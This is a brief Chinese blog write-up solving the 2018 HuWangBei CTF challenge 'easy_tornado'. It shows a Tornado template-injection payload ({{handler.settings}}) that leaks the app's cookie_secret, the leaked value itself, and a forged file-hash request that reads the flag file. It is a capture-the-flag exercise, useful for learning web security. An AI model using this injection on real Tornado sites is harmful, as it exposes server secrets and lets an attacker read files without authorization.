「护网杯」 2018 easy_tornado


知识点

漏洞 知识点
模板注入漏洞(SSTI) Tornado框架的render模板注入

解题思路

  1. 根据题目提示,发现是tornado框架

  2. 根据网站内容提示,得到以下内容。

    /flag.txt
    flag in /fllllllllllllag
    
    /welcome.txt
    render
    
    /hints.txt
    md5(cookie_secret+md5(filename))
  3. 总结

    1. flag位置/fllllllllllllag
    2. render模板注入
    3. hash校验方式
  4. 尝试修改hash值,报错跳转至/error?msg=Error

  5. 修改参数msg={{handler.settings}},得cookie_secret

    {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '36769e48-043c-43f1-b7d1-9cf8486457fa'}
  6. 直接读取flag

    /file?filename=/fllllllllllllag&filehash=2b98b6d34aea1a1a2135df9402b9579c

文章作者: 杯莫停
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 杯莫停 !
评论
  目录